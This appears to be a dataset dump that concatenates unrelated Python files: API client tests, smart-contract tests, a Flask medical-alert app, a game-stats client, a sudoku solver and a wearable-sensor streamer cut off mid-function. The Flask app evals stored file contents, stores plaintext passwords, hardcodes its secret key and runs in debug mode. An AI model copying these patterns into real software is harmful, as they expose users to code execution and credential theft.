params = self.api.get_order(amazon_order_ids)
self.assert_common_params(params, action="GetOrder")
self.assertEqual(params["AmazonOrderId.Id.1"], amazon_order_ids[0])
self.assertEqual(params["AmazonOrderId.Id.2"], amazon_order_ids[1])
self.assertEqual(params["AmazonOrderId.Id.3"], amazon_order_ids[2])
def test_list_order_items(self):
"""ListOrderItems operation."""
amazon_order_id = "695-3659745-3659863"
params = self.api.list_order_items(amazon_order_id=amazon_order_id)
self.assert_common_params(params, action="ListOrderItems")
self.assertEqual(params["AmazonOrderId"], amazon_order_id)
def test_list_order_items_by_next_token(self):
"""ListOrderItemsByNextToken operation, via method decorator."""
next_token = "<PASSWORD>"
params = self.api.list_order_items(next_token=next_token)
self.assert_common_params(params, action="ListOrderItemsByNextToken")
self.assertEqual(params["NextToken"], next_token)
def test_list_order_items_by_next_token_alias(self):
"""ListOrderItemsByNextToken operation, via alias method."""
next_token = "<PASSWORD>"
params = self.api.list_order_items_by_next_token(next_token)
self.assert_common_params(params, action="ListOrderItemsByNextToken")
self.assertEqual(params["NextToken"], next_token)
``` |
{
"source": "1Blackdiamondsc/seed-liquidity",
"score": 2
} |
#### File: seed-liquidity/tests/conftest.py
```python
import pytest
@pytest.fixture(scope="function", autouse=True)
def shared_setup(fn_isolation):
pass
@pytest.fixture
def agent(accounts):
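    # mainnet Lido DAO agent address, impersonated via brownie's force=True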
return accounts.at("0x3e40D73EB977Dc6a537aF587D48316feE66E9C8c", force=True)
@pytest.fixture
def lido(interface, agent):
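    # LDO token (mainnet), with the DAO agent as the default sender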
return interface.ERC20("0x5A98FcBEA516Cf06857215779Fd812CA3beF1B32", owner=agent)
@pytest.fixture
def whale(accounts):
return accounts.at("0x2F0b23f53734252Bda2277357e97e1517d6B042A", force=True)
@pytest.fixture
def weth(interface, whale):
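    # canonical WETH9 contract (mainnet)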
return interface.ERC20("0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2", owner=whale)
@pytest.fixture
def uniswap(interface):
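    # Uniswap V2 Router02 (mainnet)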
return interface.UniswapRouter("0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D")
@pytest.fixture
def seed(SeedLiquidity, uniswap, lido, weth, accounts):
return SeedLiquidity.deploy(
uniswap,
[lido, weth],
["10000000 ether", "150 ether"],
14 * 86400,
0,
{"from": accounts[0]},
)
@pytest.fixture
def seed_with_waitime(SeedLiquidity, uniswap, lido, weth, accounts):
return SeedLiquidity.deploy(
uniswap,
[lido, weth],
["10000000 ether", "150 ether"],
14 * 86400,
100,
{"from": accounts[0]},
)
```
#### File: seed-liquidity/tests/test_seed.py
```python
def test_seed(seed, lido, weth, agent, whale, interface):
pair = interface.ERC20(seed.pair())
lido_amount = seed.target(0)
weth_amount = seed.target(1)
lido.approve(seed, lido_amount)
weth.approve(seed, weth_amount)
seed.deposit([lido_amount, 0], {'from': agent})
assert lido.balanceOf(seed) == lido_amount
assert seed.balances(agent, 0) == lido_amount
assert seed.totals(0) == lido_amount
seed.deposit([0, weth_amount], {'from': whale})
assert weth.balanceOf(seed) == weth_amount
assert seed.balances(whale, 1) == weth_amount
assert seed.totals(1) == weth_amount
seed.provide()
assert seed.liquidity() > 0
assert pair.balanceOf(seed) == seed.liquidity()
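    # Uniswap V2 permanently locks 1000 wei of LP tokens (MINIMUM_LIQUIDITY) on the
    # first mint, so the pair's totalSupply exceeds the seed contract's balance by 1000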
assert pair.balanceOf(seed) + 1000 == pair.totalSupply()
seed.claim({'from': agent})
assert pair.balanceOf(agent) == seed.liquidity() // 2
seed.claim({'from': whale})
assert pair.balanceOf(whale) == seed.liquidity() // 2
def test_bail(seed, lido, weth, agent, whale, chain):
lido_before = lido.balanceOf(agent)
weth_before = weth.balanceOf(whale)
lido_amount = seed.target(0)
weth_amount = seed.target(1)
lido.approve(seed, lido_amount)
seed.deposit([lido_amount, 0], {'from': agent})
assert lido.balanceOf(agent) == lido_before - lido_amount
weth.approve(seed, weth_amount)
seed.deposit([0, weth_amount], {'from': whale})
assert weth.balanceOf(whale) == weth_before - weth_amount
chain.sleep(14 * 86400)
seed.bail({'from': agent})
assert lido.balanceOf(agent) == lido_before
seed.bail({'from': whale})
assert weth.balanceOf(whale) == weth_before
``` |
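
The assertions above imply a simple pro-rata accounting: half of the minted LP tokens are attributed to each token side, and a depositor's claim on a side scales with their share of that side's deposits. A minimal sketch of that math, assuming this is how `SeedLiquidity` splits `liquidity()` (the contract source is not shown here):

```python
def claim_share(liquidity, balances, totals):
    """Pro-rata LP claim: half the liquidity per token side, scaled by the
    depositor's share of that side's total deposits."""
    share = 0
    for balance, total in zip(balances, totals):
        if total:
            share += liquidity // 2 * balance // total
    return share

# each depositor in the tests fills one side completely, so each claims half
assert claim_share(10_000, [500, 0], [500, 300]) == 5_000
assert claim_share(10_000, [0, 300], [500, 300]) == 5_000
```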
{
"source": "1blackghost/Fall_Management",
"score": 3
} |
#### File: 1blackghost/Fall_Management/main.py
```python
from flask import *
app=Flask(__name__)
app.config['SECRET_KEY']="thisisasecretkey"
@app.route("/logout")
def logout():
if 'user' in session and 'role' in session:
session.pop('user',None)
session.pop('role',None)
return redirect(url_for('home'))
@app.route('/home',methods=['GET','POST'])
def root():
if 'user' in session and 'role' in session:
if session['step']=="False":
if request.method=='POST':
history=request.form['history']
medicines=request.form['medicines']
doctor=request.form["doctor"]
r1=request.form['r1']
r2=request.form['r2']
with open("add.txt",'r') as f:
d=eval(f.read())
main=[]
main.append(session['user'])
main.append(history)
main.append(medicines)
main.append(doctor)
main.append(r1)
main.append(r2)
d.append(main)
with open("add.txt",'w') as f:
f.write(str(d))
with open("data.txt",'r') as f:
d=eval(f.read())
for i in d:
if i[0]==session['user']:
i[5]="True"
with open('data.txt','w') as f:
f.write(str(d))
session['step']="True"
return redirect(url_for('root'))
return render_template('step2.html')
if session['role']=="Ambulance Driver":
with open("data.txt",'r') as f:
d=eval(f.read())
for i in d:
if i[0]==session['user']:
try:
param=i[4]
param=param.split(":")
lat=param[4]
lng=param[6]
except:
return render_template("ambulance.html",username=session['user'],error="Oops! Maps Could Not Be Loaded With Location Off!")
if request.method=="POST":
return render_template('map.html',lat=lat,lng=lng,name="Your Location: ",error="")
return render_template("ambulance.html",username=session['user'])
with open("add.txt",'r') as f:
d=eval(f.read())
for i in d:
if i[0]==session['user']:
history=i[1]
medicines=i[2]
doctor=i[3]
r1=i[4]
r2=i[5]
return render_template('root.html',username=session['user'],history=history,medicines=medicines,doctor=doctor,r1=r1,r2=r2)
else:
return redirect(url_for('login'))
@app.errorhandler(404)
def page_not_found(e):
print(e)
return render_template('404.html')
@app.route("/")
def home():
return render_template("home.html")
@app.route("/signup",methods=["GET","POST"])
def signup():
if request.method=="POST":
username=request.form['name']
email=request.form['email']
password=request.form['password']
conf_password=request.form['conf']
loc=request.form["demo"]
print(password,conf_password)
error="Something went wrong!"
try:
role=request.form['options']
except:
return render_template("signup.html",error=error)
if username=="":
return render_template("signup.html",error=error)
if password=="":
return render_template("signup.html",error=error)
if email=="":
return render_template("signup.html",error=error)
if conf_password=="":
return render_template("signup.html",error=error)
if role=="":
return render_template("signup.html",error="Role Error")
if str(password)!=str(conf_password):
return render_template("signup.html",error="Passwords Don't Match!")
data_list=[]
data_list.append(username)
data_list.append(email)
data_list.append(password)
data_list.append(role)
data_list.append(loc)
if role=="User":
data_list.append("False")
else:
data_list.append("None")
with open("data.txt",'r') as f:
d=eval(f.read())
d.append(data_list)
with open('data.txt','w') as f:
f.write(str(d))
session['user']=str(username)
session['role']=str(role)
if role=="User":
session['step']=str("False")
else:
session['step']=str("True")
return redirect(url_for("root"))
return render_template("signup.html")
@app.route("/login",methods=['GET','POST'])
def login():
if request.method=="POST":
username=request.form['name']
password=request.form['password']
loc=request.form["demo"]
with open("data.txt","r") as f:
d=eval(f.read())
In=False
for i in d:
if i[0]==username or i[1]==username:
if i[2]==password:
session['user']=username
session['role']=str(i[3])
session['step']=i[5]
In=True
return redirect(url_for('root'))
if not In:
return render_template("login.html",error="No Match Or User Not Found!")
return render_template("login.html")
if __name__=="__main__":
app.run(debug=True)
``` |
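
The app above persists records by writing `str(list)` to text files and reading them back with `eval()`, which breaks on malformed files and executes whatever the file contains. A minimal sketch of a JSON-based alternative; the helper names are hypothetical and not part of the app:

```python
import json
import os

def load_records(path):
    """Read a list of records from a JSON file, returning [] if it is missing."""
    if not os.path.exists(path):
        return []
    with open(path, "r") as f:
        return json.load(f)

def save_records(path, records):
    """Persist records as JSON, so reads never need eval()."""
    with open(path, "w") as f:
        json.dump(records, f)

records = load_records("data.json")
records.append(["user", "history", "medicines", "doctor", "r1", "r2"])
save_records("data.json", records)
```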
{
"source": "1Blademaster/siegeStatsGrabber",
"score": 2
} |
#### File: 1Blademaster/siegeStatsGrabber/auth.py
```python
import asyncio
import base64
import json
import os
from datetime import datetime, timedelta
import aiohttp
import requests
from colorama import Fore, Style
class Auth:
def __init__(self, email, password):
self.token = base64.b64encode((email + ":" + password).encode("utf-8")).decode("utf-8")
self.appId = '39baebad-39e5-4552-8c25-2c9b919064e2'
self.getAuthData()
def getAuthData(self):
headers = {
'Content-Type': 'application/json',
'Authorization': 'Basic ' + self.token,
'Ubi-AppId': self.appId
}
r = requests.post('https://public-ubiservices.ubi.com/v3/profiles/sessions', headers=headers)
respData = r.json()
self.ticket = respData['ticket']
self.sessionId = respData['sessionId']
self.sessionKey = respData['sessionKey']
self.spaceId = respData['spaceId']
self.ownUserId = respData['userId']
def getUserId(self, username):
if os.path.isfile('cachedNames.txt'):
with open('cachedNames.txt', 'r') as f:
for line in f.readlines():
_line = line.split(' : ')
if _line[0] == username:
return _line[1].strip()
else:
open('cachedNames.txt', 'w').close()
headers = {
'Content-Type': 'application/json',
'Authorization': 'Ubi_v1 t=' + self.ticket,
'Ubi-AppId': self.appId,
'Ubi-SessionId': self.sessionId,
'Connection': 'keep-alive',
}
r = requests.get(f'https://public-ubiservices.ubi.com/v2/profiles?nameOnPlatform={username}&platformType=UPLAY', headers=headers)
try:
userId = r.json()['profiles'][0]['userId']
with open('cachedNames.txt', 'a') as f:
f.write(f'{username.strip()} : {userId}\n')
except:
print(f'{Fore.RED}[Error]{Style.RESET_ALL} Could not find the user ID for: {username}')
userId = None
return userId
def getLink(self, statType, username):
userId = self.getUserId(username)
if not userId: return False
if statType == 'summary':
return f'https://r6s-stats.ubisoft.com/v1/current/summary/{userId}?gameMode=all,ranked,unranked,casual&platform=PC&startDate=20151210&endDate={datetime.now().strftime("%Y%m%d")}'
elif statType == 'seasonal':
return f'https://r6s-stats.ubisoft.com/v1/seasonal/summary/{userId}?gameMode=all,ranked,casual,unranked&platform=PC&startDate=20151210&endDate={datetime.now().strftime("%Y%m%d")}'
elif statType == 'operator':
return f'https://r6s-stats.ubisoft.com/v1/current/operators/{userId}?gameMode=all,ranked,casual,unranked&platform=PC&teamRole=attacker,defender&startDate=20151210&endDate={datetime.now().strftime("%Y%m%d")}'
elif statType == 'rank':
            return f'https://public-ubiservices.ubi.com/v1/spaces/5172a557-50b5-4665-b7db-e3f2e8c5041d/sandboxes/OSBOR_PC_LNCH_A/r6karma/players?board_id=pvp_ranked&season_id=-1&region_id=ncsa&profile_ids={userId}'
elif statType == 'map':
return f'https://r6s-stats.ubisoft.com/v1/current/maps/{userId}?gameMode=all,ranked,unranked,casual&platform=PC&startDate=20151210&endDate={datetime.now().strftime("%Y%m%d")}'
elif statType == 'all':
return [
f'https://r6s-stats.ubisoft.com/v1/current/summary/{userId}?gameMode=all,ranked,unranked,casual&platform=PC&startDate=20151210&endDate={datetime.now().strftime("%Y%m%d")}',
f'https://r6s-stats.ubisoft.com/v1/seasonal/summary/{userId}?gameMode=all,ranked,casual,unranked&platform=PC&startDate=20151210&endDate={datetime.now().strftime("%Y%m%d")}',
f'https://r6s-stats.ubisoft.com/v1/current/operators/{userId}?gameMode=all,ranked,casual,unranked&platform=PC&teamRole=attacker,defender&startDate=20151210&endDate={datetime.now().strftime("%Y%m%d")}',
                f'https://public-ubiservices.ubi.com/v1/spaces/5172a557-50b5-4665-b7db-e3f2e8c5041d/sandboxes/OSBOR_PC_LNCH_A/r6karma/players?board_id=pvp_ranked&season_id=-1&region_id=ncsa&profile_ids={userId}',
f'https://r6s-stats.ubisoft.com/v1/current/maps/{userId}?gameMode=all,ranked,unranked,casual&platform=PC&startDate=20151210&endDate={datetime.now().strftime("%Y%m%d")}'
]
else:
            print(f'{Fore.RED}[Error]{Style.RESET_ALL} Unknown stat type')
return False
async def fetchData(self, link):
headers = {
'Content-Type': 'application/json',
'Authorization': 'Ubi_v1 t=' + self.ticket,
'Ubi-AppId': self.appId,
'Ubi-SessionId': self.sessionId,
'Connection': 'keep-alive',
'expiration': f'{(datetime.now() + timedelta(hours=2)).strftime("%Y-%m-%dT%H:%M:%S")}.657Z'
}
if link:
async with aiohttp.ClientSession() as session:
async with session.get(link, headers=headers) as r:
if r.status == 200:
return await r.json()
else:
                        print(f'{Fore.RED}[Error]{Style.RESET_ALL} An error occurred: ')
print(r.reason)
return False
else:
return False
``` |
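
A sketch of how the `Auth` class above might be driven end to end: build the five stat links for one player and fetch them concurrently. The credentials and player name are placeholders, and this assumes valid Ubisoft credentials and network access:

```python
import asyncio

async def grab_all_stats(email, password, username):
    """Fetch all five stat endpoints for one player concurrently."""
    auth = Auth(email, password)           # performs the Ubisoft session login
    links = auth.getLink('all', username)  # returns False if the user id lookup fails
    if not links:
        return []
    return await asyncio.gather(*(auth.fetchData(link) for link in links))

# results = asyncio.run(grab_all_stats("me@example.com", "secret", "SomePlayer"))
```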
{
"source": "1Blademaster/sudoku_engine",
"score": 4
} |
#### File: 1Blademaster/sudoku_engine/sudoku.py
```python
import copy
import random
class Board:
"""
__init__ [code (optional): string]:
        Initialise the board object
boardToCode [input_board (optional): list]:
Convert a board represented by a list into a string representation
findSpaces []:
Finds the first empty space, represented by a 0, on the current board
checkSpace [num: integer, space: tuple]:
Returns a bool, depending if the number passed in can exist in a space on the current board, provided by the tuple argument
solve []:
Solves the current board using backtracking
solveForCode []:
Calls the solve method and returns the solved board in a string code format
generateQuestionBoardCode [difficulty: integer]:
Calls the generateQuestionBoard method and returns a question board and its solution in code format
generateQuestionBoard [fullBoard: list, difficulty: integer]:
Returns a randomly generated question board and the solution to the same board, the difficulty represents the number of number squares
removed from the board
__generateRandomCompleteBoard []:
Returns a full randomly generated board
__generateCont []:
Uses recursion to finish generating a full board, whilst also making sure the board is solvable by calling the solve method
findNumberOfSolutions []:
Finds the number of solutions to the current board and returns a list of all the solutions in code format
__findSpacesToFindNumberOfSolutions [board: list, h: integer]:
Finds the first empty space in the board given as the argument, used within the findNumberOfSolutions method
    __solveToFindNumberOfSolutions [row: integer, col: integer]:
Solves the current board using recursion by starting at the position determined by the row and col, used within the findNumberOfSolutions method
__resetBoard []:
Resets the current board to an empty state
"""
def __init__(self, code=None):
self.__resetBoard()
if code: # create a board from the code inputted
self.code = code
for row in range(9):
for col in range(9):
self.board[row][col] = int(code[0])
code = code[1:]
else:
self.code = None
def boardToCode(self, input_board=None): # turn a pre-existing board into a code
if input_board:
_code = ''.join([str(i) for j in input_board for i in j])
return _code
else:
self.code = ''.join([str(i) for j in self.board for i in j])
return self.code
def findSpaces(self): # finds the first empty space in the board; where there is not a number
for row in range(len(self.board)):
for col in range(len(self.board[0])):
if self.board[row][col] == 0:
return (row, col)
return False
    def checkSpace(self, num, space): # checks to see if a number can be fitted into a specific space; row, col
if not self.board[space[0]][space[1]] == 0: # check to see if space is a number already
return False
for col in self.board[space[0]]: # check to see if number is already in row
if col == num:
return False
for row in range(len(self.board)): # check to see if number is already in column
if self.board[row][space[1]] == num:
return False
_internalBoxRow = space[0] // 3
_internalBoxCol = space[1] // 3
for i in range(3): # check to see if internal box already has number
for j in range(3):
if self.board[i + (_internalBoxRow * 3)][j + (_internalBoxCol * 3)] == num:
return False
return True
def solve(self): # solves a board using recursion
_spacesAvailable = self.findSpaces()
if not _spacesAvailable:
return True
else:
row, col = _spacesAvailable
for n in range(1, 10):
if self.checkSpace(n, (row, col)):
self.board[row][col] = n
if self.solve():
return self.board
self.board[row][col] = 0
return False
def solveForCode(self): # solves a board and returns the code of the solved board
return self.boardToCode(self.solve())
def generateQuestionBoardCode(self, difficulty): # generates a new random board and its board code depending on the difficulty
self.board, _solution_board = self.generateQuestionBoard(self.__generateRandomCompleteBoard(), difficulty)
return self.boardToCode(), self.boardToCode(_solution_board)
def generateQuestionBoard(self, fullBoard, difficulty): # generates a question board with a certain amount of numbers removed depending on the chosen difficulty
self.board = copy.deepcopy(fullBoard)
if difficulty == 0:
_squares_to_remove = 36
elif difficulty == 1:
_squares_to_remove = 46
elif difficulty == 2:
_squares_to_remove = 52
else:
return
_counter = 0
while _counter < 4:
_rRow = random.randint(0, 2)
_rCol = random.randint(0, 2)
if self.board[_rRow][_rCol] != 0:
self.board[_rRow][_rCol] = 0
_counter += 1
_counter = 0
while _counter < 4:
_rRow = random.randint(3, 5)
_rCol = random.randint(3, 5)
if self.board[_rRow][_rCol] != 0:
self.board[_rRow][_rCol] = 0
_counter += 1
_counter = 0
while _counter < 4:
_rRow = random.randint(6, 8)
_rCol = random.randint(6, 8)
if self.board[_rRow][_rCol] != 0:
self.board[_rRow][_rCol] = 0
_counter += 1
_squares_to_remove -= 12
_counter = 0
while _counter < _squares_to_remove:
_row = random.randint(0, 8)
_col = random.randint(0, 8)
if self.board[_row][_col] != 0:
n = self.board[_row][_col]
self.board[_row][_col] = 0
if len(self.findNumberOfSolutions()) != 1:
self.board[_row][_col] = n
continue
_counter += 1
return self.board, fullBoard
def __generateRandomCompleteBoard(self): # generates a brand new completely random board full of numbers
self.__resetBoard()
_l = list(range(1, 10))
for row in range(3):
for col in range(3):
_num = random.choice(_l)
self.board[row][col] = _num
_l.remove(_num)
_l = list(range(1, 10))
for row in range(3, 6):
for col in range(3, 6):
_num = random.choice(_l)
self.board[row][col] = _num
_l.remove(_num)
_l = list(range(1, 10))
for row in range(6, 9):
for col in range(6, 9):
_num = random.choice(_l)
self.board[row][col] = _num
_l.remove(_num)
return self.__generateCont()
def __generateCont(self): # uses recursion to finish generating a random board
for row in range(len(self.board)):
for col in range(len(self.board[row])):
if self.board[row][col] == 0:
_num = random.randint(1, 9)
if self.checkSpace(_num, (row, col)):
self.board[row][col] = _num
if self.solve():
self.__generateCont()
return self.board
self.board[row][col] = 0
return False
def findNumberOfSolutions(self): # finds the number of solutions to a board and returns the list of solutions
_z = 0
_list_of_solutions = []
for row in range(len(self.board)):
for col in range(len(self.board[row])):
if self.board[row][col] == 0:
_z += 1
for i in range(1, _z+1):
_board_copy = copy.deepcopy(self)
_row, _col = self.__findSpacesToFindNumberOfSolutions(_board_copy.board, i)
_board_copy_solution = _board_copy.__solveToFindNumberOfSolutions(_row, _col)
_list_of_solutions.append(self.boardToCode(input_board=_board_copy_solution))
return list(set(_list_of_solutions))
def __findSpacesToFindNumberOfSolutions(self, board, h): # finds the first empty space it comes across, is used within the findNumberOfSolutions method
_k = 1
for row in range(len(board)):
for col in range(len(board[row])):
if board[row][col] == 0:
if _k == h:
return (row, col)
_k += 1
return False
def __solveToFindNumberOfSolutions(self, row, col): # solves the board using recursion, is used within the findNumberOfSolutions method
for n in range(1, 10):
if self.checkSpace(n, (row, col)):
self.board[row][col] = n
if self.solve():
return self.board
self.board[row][col] = 0
return False
def __resetBoard(self): # resets the board to an empty state
self.board = [
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
]
return self.board
if __name__ == '__main__':
board = Board()
question_board_code = board.generateQuestionBoardCode(1) # generates a medium level sudoku
print(question_board_code[0])
code = '300105000060200000008090060050000800800007040071009035000900084704006000902048300'
solved_board_code = Board(code).solveForCode() # solves a hard level sudoku
``` |
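
A short usage sketch for the `Board` class above, rendering the generated 81-character board code as a grid; `print_board_code` is an illustrative helper, not part of the engine:

```python
def print_board_code(code):
    """Render an 81-character board code as a 9x9 grid, '.' for blanks."""
    for r in range(9):
        row = code[r * 9:(r + 1) * 9]
        print(' '.join(ch if ch != '0' else '.' for ch in row))

question_code, solution_code = Board().generateQuestionBoardCode(0)  # easy puzzle
print_board_code(question_code)
```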
{
"source": "1bod/ProjetJukebox",
"score": 3
} |
#### File: 1bod/ProjetJukebox/main.py
```python
from threading import Thread
import monstercat_api
import interface
import fenetre
def startup(objet_fenetre:interface.Chargement):
"""Fonction de démarrage du programme"""
threads = []
results= []
releases=monstercat_api.get_releases()
# création de la liste des sorties à afficher
sorties=[] #sorties[] = (CatalogId, AudioPath, CoverPath)
nombre_telecharge=0
for sortie in releases["Releases"]["Data"]:
if sortie["Streamable"] is True and nombre_telecharge<12:
nombre_telecharge+=1
thread = Thread(target=monstercat_api.get_track, args=(sortie["CatalogId"],"chansons","images", results))
threads.append(thread)
try:
objet_fenetre.add_progress(10)
objet_fenetre.update_idletasks()
except: # pylint: disable=bare-except
pass
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for result in results:
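        # note: 'sortie' below still refers to the last item of the releases loop
        # above, so every tuple gets the same CatalogId; pairing ids per-result
        # would require each worker thread to report its own CatalogId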
sorties.append((sortie["CatalogId"],result[0],result[1]))
# audio_path, image_path = monstercat_api.get_track(sortie["CatalogId"],"chansons","images")
#sorties.append((sortie["CatalogId"],audio_path, image_path))
objet_fenetre.destroy()
fenetre.demarrage()
if __name__ == "__main__":
    chargement=interface.Chargement("Downloading the latest tracks...", callback=startup)
chargement.start()
``` |
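
The `startup` function above fans downloads out across threads that append into a shared `results` list; CPython's `list.append` is atomic, but pairing each result with the release it belongs to is safer with index-addressed slots. A minimal sketch of that pattern with a hypothetical worker:

```python
from threading import Thread

def fetch(catalog_id, results, slot):
    # hypothetical worker: store this release's (audio_path, cover_path)
    results[slot] = ("chansons/%s.mp3" % catalog_id, "images/%s.jpg" % catalog_id)

catalog_ids = ["MCS001", "MCS002", "MCS003"]  # placeholder ids
results = [None] * len(catalog_ids)
threads = [Thread(target=fetch, args=(cid, results, i))
           for i, cid in enumerate(catalog_ids)]
for t in threads:
    t.start()
for t in threads:
    t.join()
# results[i] now belongs unambiguously to catalog_ids[i]
```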
{
"source": "1bubneb/streaminghub",
"score": 2
} |
#### File: streaminghub/connectors/empatica_e4.py
```python
import codecs
import socket
import numpy as np
# constants
from lsl_outlet import create_outlet
BUFFER_SIZE = 4096
# acc - 3 - axis acceleration
# bvp - Blood Volume Pulse
# gsr - Galvanic Skin Response
# ibi - Inter-Beat Interval and Heartbeat
# tmp - Skin Temperature
# bat - Device Battery
# tag - Tag taken from the device
STREAMS = ['acc', 'bvp', 'gsr', 'tmp', 'ibi', 'bat', 'tag']
STREAM_IDS = ['E4_Acc', 'E4_Bvp', 'E4_Gsr', 'E4_Temperature', 'E4_Ibi', 'E4_Hr', 'E4_Battery', 'E4_Tag']
TAGS = []
# states
class STATES:
NEW__ = 'new'
WAITING__ = 'waiting'
NO_DEVICES__ = 'no_devices'
DEVICES_FOUND__ = 'devices_found'
CONNECTED_TO_DEVICE__ = "connected"
READY_TO_SUBSCRIBE__ = "ready_to_subscribe"
SUBSCRIBE_COMPLETED__ = "subscribe completed"
STREAMING__ = 'streaming'
# commands
class COMMANDS:
DEVICE_LIST__ = 'device_list'
DEVICE_CONNECT__ = 'device_connect'
DEVICE_SUBSCRIBE__ = 'device_subscribe'
PAUSE__ = "pause"
channel_description = {
'E4_Acc_x': {
'unit': 'g',
'type': 'acceleration',
'freq': '32'
},
'E4_Acc_y': {
'unit': 'g',
'type': 'acceleration',
'freq': '32'
},
'E4_Acc_z': {
'unit': 'g',
'type': 'acceleration',
'freq': '32'
},
'E4_Bvp': {
'unit': '',
'type': '',
'freq': '64'
},
    # reordered so dict order matches the sample[] indices used in
    # process_data_stream (Gsr=4, Temperature=5, Ibi=6), assuming
    # create_outlet declares channels in dict order
    'E4_Gsr': {
        'unit': '',
        'type': '',
        'freq': '4'
    },
    'E4_Temperature': {
        'unit': '',
        'type': '',
        'freq': '4'
    },
    'E4_Ibi': {
        'unit': 'ms',
        'type': 'interval',
        'freq': 'N/A'
    },
'E4_Hr': {
'unit': '',
'type': '',
'freq': 'N/A'
},
'E4_Battery': {
'unit': '',
'type': '',
'freq': '64'
},
'E4_Tag': {
'unit': '',
'type': '',
'freq': '64'
}
}
OUTLET = create_outlet('Empatica_E4', 'wristband', channel_description, 'Empatica', 'E4', '1234567890')
# State
STATE = STATES.NEW__
DEVICE = None
stream_i = 0
class DataStream:
sample = []
# init sample array with NaN values
for i in range(0,10):
sample.append(np.nan)
def process_data_stream(cmd: str):
d = next(filter(lambda x: cmd.startswith(x), STREAM_IDS), None)
if d is not None:
# data stream. handle accordingly
try:
if d == 'E4_Acc':
t, x, y, z = [float(n) for n in cmd.split(' ')[1:]]
if OUTLET.have_consumers():
sample[0:3] = [x, y, z]
OUTLET.push_sample(sample, t)
elif d == 'E4_Bvp':
t, v = [float(n) for n in cmd.split(' ')[1:]]
if OUTLET.have_consumers():
sample[3] = v
OUTLET.push_sample(sample, t)
elif d == 'E4_Gsr':
t, v = [float(n) for n in cmd.split(' ')[1:]]
if OUTLET.have_consumers():
sample[4] = v
OUTLET.push_sample(sample, t)
elif d == 'E4_Temperature':
t, v = [float(n) for n in cmd.split(' ')[1:]]
if OUTLET.have_consumers():
sample[5] = v
OUTLET.push_sample(sample, t)
elif d == 'E4_Ibi':
t, v = [float(n) for n in cmd.split(' ')[1:]]
if OUTLET.have_consumers():
sample[6] = v
OUTLET.push_sample(sample, t)
elif d == 'E4_Hr':
t, v = [float(n) for n in cmd.split(' ')[1:]]
if OUTLET.have_consumers():
sample[7] = v
OUTLET.push_sample(sample, t)
elif d == 'E4_Battery':
t, v = [float(n) for n in cmd.split(' ')[1:]]
if OUTLET.have_consumers():
sample[8] = v
OUTLET.push_sample(sample, t)
elif d == 'E4_Tag':
                t = float(cmd.split(' ')[1])  # tag events carry only a timestamp
if OUTLET.have_consumers():
                    sample[9] = 1.0  # mark that a tag event occurred (no payload value)
OUTLET.push_sample(sample, t)
print('.', end='', flush=True)
except Exception as e:
print('Error: ', e)
else:
# some other message
print('Unknown message: %s' % cmd)
DS = DataStream
sample = DataStream.sample  # module-level alias so the stream handlers above can fill the shared sample buffer
def msg(s_: str) -> bytes:
return codecs.encode(s_ + '\r\n')
def set_devices_connected(num: int, devices: list):
global DEVICE
print('%d device(s) found: %s' % (num, ', '.join([id_ for id_, name_ in devices])))
set_state(STATES.NO_DEVICES__ if num == 0 else STATES.DEVICES_FOUND__)
if num > 1:
# ask user to select device
id_ = input('Select device id: ')
if id_ in [y for x, y in devices]:
DEVICE = id_
else:
print('Invalid device id')
exit(1)
elif num == 1:
id_ = devices[0][0]
print('Selecting %s' % id_)
DEVICE = id_
def set_state(state: str):
global STATE
STATE = state
def process_incoming_msgs():
global stream_i
in_msg: str = codecs.decode(s.recv(BUFFER_SIZE))
# parse message(s)
in_msg_cmds = [x.strip() for x in in_msg.split('\r\n')]
for cmd in in_msg_cmds:
if len(cmd) == 0 or cmd.find(' ') == -1:
continue
# Handle responses to request
if cmd[0] == 'R':
cmd = cmd[2:]
i = cmd.find(' ')
# DEVICE_LIST response
if cmd[:i] == COMMANDS.DEVICE_LIST__:
cmd = cmd[i + 1:]
# list devices connected
i = cmd.find(' ')
num = int(cmd[:i]) if i != -1 else 0
devices = []
if num > 0:
cmds = cmd[i + 3:].split(' | ')
if len(cmds) != num:
print('device count mismatch')
exit(1)
devices = [x.split(' ') for x in cmds]
set_devices_connected(num, devices)
# DEVICE_CONNECT response
elif cmd[:i] == COMMANDS.DEVICE_CONNECT__:
cmd = cmd[i + 1:]
i = cmd.find(' ')
status = cmd[:i] if i != -1 else cmd
if status == "ERR":
cmd = cmd[i + 1:]
print('Error connecting to device: %s' % cmd)
exit(1)
elif status == "OK":
print('Connected to device')
set_state(STATES.CONNECTED_TO_DEVICE__)
# PAUSE response
elif cmd[:i] == COMMANDS.PAUSE__:
cmd = cmd[i + 1:]
i = cmd.find(' ')
status = cmd[:i] if i != -1 else cmd
if status == "ERR":
cmd = cmd[i + 1:]
print('Error pausing streaming: %s' % cmd)
exit(1)
elif status == "ON":
print('Streaming on hold')
set_state(STATES.READY_TO_SUBSCRIBE__)
elif status == "OFF":
print('Streaming started')
set_state(STATES.STREAMING__)
# DEVICE SUBSCRIBE response
elif cmd[:i] == COMMANDS.DEVICE_SUBSCRIBE__:
cmd = cmd[i + 1:]
i = cmd.find(' ')
stream_type = cmd[:i]
cmd = cmd[i + 1:]
i = cmd.find(' ')
status = cmd[:i] if i != -1 else cmd
if status == "ERR":
cmd = cmd[i + 1:]
print('Error subscribing to stream %s: %s' % (stream_type, cmd))
exit(1)
elif status == "OK":
print('Subscribed: %s' % stream_type)
stream_i += 1
if stream_i == len(STREAMS):
set_state(STATES.SUBSCRIBE_COMPLETED__)
else:
set_state(STATES.READY_TO_SUBSCRIBE__)
# Handle data stream
elif STATE == STATES.STREAMING__:
process_data_stream(cmd)
def handle_outgoing_msgs():
if STATE == STATES.NEW__:
# request devices list
print('Getting list of devices...')
s.send(msg(COMMANDS.DEVICE_LIST__))
set_state(STATES.WAITING__)
elif STATE == STATES.NO_DEVICES__:
print('No devices found!')
exit(1)
elif STATE == STATES.DEVICES_FOUND__:
# connect to device
print('Connecting to device...')
